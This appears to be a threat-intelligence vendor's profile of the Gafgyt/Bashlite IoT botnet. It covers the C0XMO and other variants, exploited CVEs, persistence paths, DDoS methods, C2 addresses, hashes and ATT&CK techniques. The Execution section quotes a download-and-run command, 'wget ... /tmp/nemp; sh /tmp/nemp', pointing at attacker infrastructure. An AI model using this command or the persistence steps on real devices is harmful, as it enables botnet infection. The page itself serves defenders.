Gafgyt
Gafgyt, also widely known as Bashlite, is a Linux/IoT botnet malware family used primarily to compromise internet-exposed embedded devices and conscript them into DDoS botnets. The content associates it with aliases including Bashlite, Lizkebab, Torlus, Qbot, Remaiten, and related naming used across overlapping IoT botnet reporting. It is repeatedly described as targeting Linux-based IoT and embedded systems such as routers, cameras, DVRs, and other internet-connected devices, commonly through weak/default credentials, Telnet or SSH brute forcing, and exploitation of known vulnerabilities.
The content specifically describes multiple Gafgyt variants and campaigns. A March 2026 FortiGuard Labs report identified a new Gafgyt variant named C0XMO exploiting CVE-2021-27137, a stack buffer overflow in vulnerable DD-WRT UPnP/SSDP handling reachable via crafted M-SEARCH requests to UDP/1900. In that activity, the malware was downloaded into /tmp/.cache, targeted a Japanese technology company, and was traced to source infrastructure in Germany. C0XMO was compiled for multiple Linux architectures including ARM, MC68000, MIPS R3000, PowerPC, SuperH, Intel 80386/80836, and AMD64, indicating broad cross-platform targeting. The same reporting states that C0XMO used a separate Python scanner/lateral movement component, established persistence by copying itself to hidden paths such as /tmp/.sys, /var/tmp/.sys, /dev/shm/.sys, and optionally $HOME/.sys, set execute permissions, created cron jobs every 15 minutes, modified ~/.profile, ~/.bashrc, and ~/.bash_profile, and could re-execute itself if terminated. It also killed competing malware and removed rival persistence artifacts. After persistence, it connected to C2 85[.]215[.]131[.]70 using a custom handshake and supported heartbeat, scanning, and 19 DDoS methods including UDP, TCP, SYN, NTP amplification, Memcached amplification, ICMP, Ping of Death, HTTP floods, and Cloudflare-bypass HTTP flooding. Its scanner script was fetched from 217[.]160[.]125[.]125:15527 and brute-forced Telnet/SSH, scanned ports including 23, 22, 80, 443, 8080, 5555, 5511, 5554, 4443, 81, 8000, 7547, 8081, 8443, and 8888, exploited multiple HTTP vulnerabilities, and abused exposed ADB services.
Other Gafgyt activity in the content includes exploitation of CVE-2023-1389 in TP-Link Archer AX21 routers, where Fortinet observed a Gafgyt variant among at least six botnet operations abusing the flaw for router compromise and DDoS use. Unit 42 also reported a Gafgyt variant exploiting CVE-2018-9866 in older unsupported SonicWall Global Management System versions shortly after public exploit tooling appeared. That SonicWall-targeting variant was built on the Gafgyt codebase, supported scanner commands for HUAWEI, GPON, D-LINK, and SONICWALL targets, a BIN_UPDATE command for HTTP-based updates, and a BN command for Blacknurse DDoS attacks.
The family is repeatedly tied to DDoS operations. The content places Gafgyt among botnets used in attacks observed during the Russia-Ukraine conflict, with C2s including 172.245.6.134 and 188.127.237.5 targeting Ukrainian government and related sites, and additional Gafgyt infrastructure used against Russian .ru targets. It is also referenced historically in large IoT-botnet-driven DDoS reporting and in abuse of Valve Source Engine ports 27015/27016 for amplification or botnet-related activity.
The content also notes code reuse and ecosystem overlap with other IoT malware. Enemybot is described as using code from both Gafgyt and Mirai. Mozi was initially flagged by many engines as Gafgyt because it reused part of the codebase, though the report states it is distinct. Detection references in the content include Fortinet verdicts such as ELF/Gafgyt.SORA!tr, ELF/Gafgyt.C0MOX!tr, and Python/Gafgyt.C0MOX!tr, as well as generic ELF32 UPX-packing heuristics often associated with Linux botnets including Mirai, Gafgyt, and Tsunami.
High-confidence indicators directly mentioned for the C0XMO variant include infrastructure 85[.]215[.]131[.]70, 217[.]160[.]125[.]125:15527, and 176[.]100[.]37[.]91, along with hashes 444a9d34a9f59dc7975dfabefb47d789813a4497bbac9127c4806dd816e85211, 9394666007fac4014a4641fdae150c1b969ed2bc4299876318a336fd386abf59, 450ea44da0c9d96a2e8f4d6bad34f1c35cd35743295b8cd2defa9f7a9884685d, d452f22dacab9785539484245c13e9cce58df23fc82eeef205684fcd196da20b, 20042f1efb59c99e3addf822a3e9e5a496f0b701362df038a50a32a9f504a136, 7413cbb6eab4d6b10346f71be5dd76d7cf2f4817f7776367b162f83755aefa1f, b6f835ced11059d341222eba11fff3a4672f4de47a3a4d791fad86059a2b06d4, b61a5508847a2167b737d31193dc393e92c5be2aa5141bbe4b7ea6f440fd4799, dff0edae6e8854ddd3e617054ee0bd74c696c91411f704dff60aabaec839bec9, and ea44138b9701fce1b2fe13de8f9e00681c007c9adc625edc9f507f177704c2e8.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
16 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
In March, Labs identified a new Gafgyt botnet variant called C0XMO that spreads by exploiting CVE-2021-27137. The malware is delivered through a stack buffer overflow in vulnerable DD-WRT router firmware, triggered by malicious SSDP M-SEARCH requests sent to UDP port 1900. | In March, Labs identified a new Gafgyt botnet variant called C0XMO that spreads by exploiting CVE-2021-27137.
The scanner also includes numerous HTTP-based exploits for initial access, including... AVTECH DVR Vulnerability (CVE-2025-34054, CVE-2016-15047)... FortiGuard Labs provides an IPS signature against attacks exploiting... CVE-2016-15047: Avtech DVR Camera Authentication bypass and Command Execution Exploit
The scanner also includes numerous HTTP-based exploits for initial access, including... HNAP SOAP Injection (CVE-2015-2051)... FortiGuard Labs provides an IPS signature against attacks exploiting... CVE-2015-2051: D-Link.Devices.HNAP.SOAPAction-Header.Command.Execution.Vulnerability
The scanner also includes numerous HTTP-based exploits for initial access, including... AVTECH DVR Vulnerability (CVE-2025-34054, CVE-2016-15047)... FortiGuard Labs provides an IPS signature against attacks exploiting... CVE-2025-34054: Avtech DVR Camera Authentication bypass and Command Execution Exploit
The scanner also includes numerous HTTP-based exploits for initial access, including... GLPI htmLawed RCE (CVE-2022-35914)... FortiGuard Labs provides an IPS signature against attacks exploiting... CVE-2022-35914: GLPI-Project.GLPI.htmLawedTest.php.Code.Injection
Tracked as CVE-2023-1389, the flaw is a high-severity unauthenticated command injection problem in the locale API reachable through the TP-Link Archer AX21 web management interface. | Recently, we observed multiple attacks focusing on this year-old vulnerability, spotlighting botnets like Moobot, Miori, the Golang-based agent "AGoent," and the Gafgyt Variant.
The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS). | Some of the commands supported are described in the table below... HUAWEI: Send CVE-2017-17215.
At that time we found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older). | The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.
Botnet attacks aimed at PHP servers involved the exploitation of PHPUnit, Laravel, and ThinkPHP Framework remote code execution flaws, tracked as CVE-2017-9841, CVE-2021-3129, and CVE-2022-47945, respectively.
Widely known Internet of Things device vulnerabilities including the Spring Cloud Gateway RCE, tracked as CVE-2022-22947, the TBK DVR-4104 and DVR-4216 command injection bug, tracked as CVE-2024-3721, and an MVPower DVR misconfiguration were also abused in botnet attacks.
Widely known Internet of Things device vulnerabilities including the Spring Cloud Gateway RCE, tracked as CVE-2022-22947, the TBK DVR-4104 and DVR-4216 command injection bug, tracked as CVE-2024-3721, and an MVPower DVR misconfiguration were also abused in botnet attacks.
Botnet attacks aimed at PHP servers involved the exploitation of PHPUnit, Laravel, and ThinkPHP Framework remote code execution flaws, tracked as CVE-2017-9841, CVE-2021-3129, and CVE-2022-47945, respectively.
Botnet attacks aimed at PHP servers involved the exploitation of PHPUnit, Laravel, and ThinkPHP Framework remote code execution flaws, tracked as CVE-2017-9841, CVE-2021-3129, and CVE-2022-47945, respectively.
“...most of the malware samples are from well-known malware families like Mirai, Gafgyt and Mozi.”
CVE-2025-55182 is a CVSS 10.0 pre-authentication remote code execution vulnerability with a public Metasploit module. Exploitation requires only a single HTTP POST request... affects React Server Components... The flaw exists in how serialized data is processed, allowing an attacker to send a malicious POST request that the server deserializes and executes without authentication or user interaction.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueSurveillance cameras in shopping malls are being targeted to form a large botnet... the DDoS attack now peaked at 20,000 requests per second and originated from nearly 900 CCTV cameras running embedded versions of Linux and the BusyBox toolkit.
Initial Access
2 techniquesThe crooks made this possible because CCTV camera operators are taking a Lax approach to security and their failure to change default passwords on the devices.
The latter model adds a wide variety of infection methods, including brute forcing login credentials on SSH servers and exploiting known security weaknesses in other services.
Execution
2 techniquesThe exploit examples repeatedly inject shell commands such as `wget http://l.ocalhost.host/... -O -> /tmp/nemp; sh /tmp/nemp` across targeted devices and applications.
The malware is delivered through a stack buffer overflow in vulnerable DD-WRT router firmware, triggered by malicious SSDP M-SEARCH requests sent to UDP port 1900.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
1 techniqueCredential Access
1 techniqueC0XMO exhibits many traits typical of Gafgyt variants, including weak-credential brute-force attacks targeting Telnet and SSH... The scanner performs weak password brute-force attacks on Telnet and SSH services.
Discovery
4 techniquesEach botnet spreads to new hosts by scanning for vulnerable devices in order to install the malware
Continuously scans /proc/ for new processes... For each process: Checks if the binary's realpath contains .anime... Performs memory scanning of /proc/$pid/exe against signatures for known competing botnets...
The bot also actively kills competing botnet processes : mirai. sora. bot. dark. hilix. rakitin. neon. owari. aqua. boatnet. mozi.
Performs memory scanning of /proc/$pid/exe against signatures for known competing botnets: QBOT/Bashlite variants... UPX-packed binaries... Zollard worm... Remaiten...
Lateral Movement
3 techniquesCJ: I scanned the internet with a few sets of defualt logins for telnet and I was able to upload and execute a binary on 250k devices
In March, Labs identified a new Gafgyt botnet variant called C0XMO that spreads by exploiting CVE-2021-27137.
Unlike earlier variants, C0XMO uses a separate Python script for lateral movement, improving propagation across different devices and architectures.
Command and Control
2 techniquesThey use l[.]ocalhost[.]host:47883 as C2... The domain l[.]ocalhost[.]host used for C2 and to serve payloads in the Mirai variant discussed above...
After compromise, the malware was downloaded to the `/tmp/.cache` directory on the affected host.
Impact
6 techniquesissues kill(pid, 9)... unlink() the binary and kill -9 the process... This targets malware that deletes itself after execution...
Mirai , a malware strain that enslaves poorly secured Internet of Things (IoT) devices like wireless routers and security cameras into a botnet for use in large cyberattacks.
These so-called “ distributed denial-of-service ( DDoS) attacks are digital sieges in which an attacker causes thousands of hacked systems to hit a target with so much junk traffic that it falls over and remains unreachable by legitimate visitors.
In June 2014, ProxyPipe was hit with a 300 gigabit per second DDoS attack launched by lelddos... Verisign said the 2014 attack was launched by a botnet of more than 100,000 servers running on SuperMicro IPMI boards.
C0XMO supports 19 different DDoS attack methods for various scenarios... UDP Bypass Flood, TCP Flood, Hybrid TCP + UDP Flood, TCP SYN Flood... HTTP Request Storm, Slow/IO Exhaustion, HTTP GET Flood
The most common attack consisted of HTTP GET request floods originating from around 900 CCTV cameras spread around the world.
Other
1 techniqueIOCs tracked for this family
100 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
38 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A botnet malware family referenced as the parent family of the C0XMO variant.
An IoT botnet family known for weak-credential brute-force attacks against Telnet and SSH, command-injection exploitation, and DDoS capabilities. C0XMO is described as a new variant of Gafgyt.
Bashlite is referenced as another likely IoT botnet malware family capable of being used in DDoS attacks against DNS services.
Botnet malware family referenced as historically abusing Valve Source Engine ports for DDoS amplification via A2S query reflection.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.